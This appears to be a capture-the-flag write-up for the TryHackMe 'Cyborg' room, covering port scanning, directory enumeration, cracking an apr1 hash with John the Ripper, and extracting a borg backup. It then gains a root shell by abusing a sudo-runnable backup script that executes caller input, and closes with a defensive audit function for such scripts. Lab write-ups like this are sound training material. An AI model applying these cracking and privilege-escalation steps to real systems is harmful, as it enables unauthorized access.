Cyborg
January 04, 2024
Task 1 - Deploy the machine
Deploy the machine
No answer needed
Task 2 - Compromise the system
Scan the machine, how many ports are open?
2
What service is running on port 22?
ssh
What service is running on port 80?
http
What is the user.txt flag?
THM
What is the root.txt flag?
THM
nmap -sC -sV -oN nmap 10.10.47.92 -Pn -vv
# Nmap 7.93 scan initiated Thu Jan 4 15:16:12 2024 as: nmap -sC -sV -oN nmap -Pn -vv 10.10.43.109
Increasing send delay for 10.10.43.109 from 0 to 5 due to 58 out of 192 dropped probes since last increase.
Nmap scan report for 10.10.43.109
Host is up, received user-set (0.31s latency).
Scanned at 2024-01-04 15:16:12 PST for 44s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dbb270f307ac32003f81b8d03a89f365 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0grcKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2uiRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
| 256 68e6852f69655be7c6312c8e4167d7ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQPbxUF6eH2QZb20=
| 256 562c7992ca23c3914935fadd697ccaab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 4 15:16:56 2024 -- 1 IP address (1 host up) scanned in 43.88 seconds
gobuster dir -u http://10.10.47.92 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.47.92
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2024/01/05 07:45:00 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 310] [--> http://10.10.47.92/admin/]
/etc (Status: 301) [Size: 308] [--> http://10.10.47.92/etc/]
Progress: 1526 / 220561 (0.69%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2024/01/05 07:46:01 Finished
===============================================================
After that we can browse to the /admin section, where the archive page has a file we can download.

mv ~/Downloads/archive.tar .
tar -xvf archive.tar
After downloading, extract the tar archive into your working directory.
Next we navigate to the /etc subdirectory in the browser.

Here we find an MD5-based (apr1) password hash that we can crack.
We will use John the Ripper for the cracking.
cat for-john
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
john --wordlist=/usr/share/wordlists/rockyou.txt for-john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (?)
1g 0:00:00:00 DONE (2024-01-05 08:44) 8.333g/s 332800p/s 332800c/s 332800C/s jeremy21..pirilampo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
After John cracks the hash we have the passphrase: squidward.
Navigating to the admin shoutbox, we see keywords such as "music_archive".

Then we can extract the backup with the borg command, using "squidward" as the passphrase.
borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key /home/kyou/tryhackme-writeups/Cyborg/home/field/dev/final_archive:
After that we can see there is a new user in the extracted home directory.



After that we run sudo -l to see if there are any commands we can run with sudo.
Then use this command to view the root.txt

Or we can use this other way:
Go to the folder of the script that sudo allows us to run.

Then add write permission to that script.
cat backup.sh
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.
dest="/etc/mp3backups/"
# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
echo
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
cmd=$($command)
echo $cmd
/bin/bash
Just add "/bin/bash" at the end of the script; because the script runs through sudo, that line spawns a shell as root.
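As an added defender-side check (not part of the original writeup or the room), the following shell function audits a script that sudo is allowed to run and flags the properties that made backup.sh exploitable: being writable by someone other than root, and executing a string handed in through the -c flag. It assumes GNU stat (Linux); the function name audit_sudo_script and the sample files are my own.

```sh
#!/bin/sh
# Added example, not from the original writeup: audit a sudo-runnable script
# and report the misconfigurations seen in backup.sh above.
# Assumes GNU coreutils stat (Linux).

# audit_sudo_script PATH
# Prints one finding per line. Returns 0 when clean, 1 when anything was found.
audit_sudo_script() {
    path=$1
    rc=0
    if [ ! -f "$path" ]; then
        echo "MISSING: $path is not a regular file"
        return 1
    fi
    mode=$(stat -c '%a' "$path")     # e.g. 777 or 4755
    owner=$(stat -c '%U' "$path")
    group_bits=$(( (mode / 10) % 10 ))
    other_bits=$(( mode % 10 ))
    # A script that sudo runs as root should be owned by root.
    if [ "$owner" != "root" ]; then
        echo "OWNER: $path is owned by $owner; a sudo target should be root-owned"
        rc=1
    fi
    # Bit 2 of a permission digit is the write bit.
    if [ $(( group_bits & 2 )) -ne 0 ]; then
        echo "GROUP-WRITABLE: $path has mode $mode"
        rc=1
    fi
    if [ $(( other_bits & 2 )) -ne 0 ]; then
        echo "WORLD-WRITABLE: $path has mode $mode (any user can modify it)"
        rc=1
    fi
    # backup.sh does cmd=$($command): whatever follows -c is executed as root.
    if grep -Eq '\$\(\$[A-Za-z_]+\)|^[[:space:]]*eval[[:space:]]' "$path"; then
        echo "RUNS-INPUT: $path executes a caller-supplied string"
        rc=1
    fi
    return $rc
}

# Usage: audit_sudo_script /etc/mp3backups/backup.sh
```

A clean result requires the script to be root-owned, not writable by group or others, and free of constructs that run caller-supplied input.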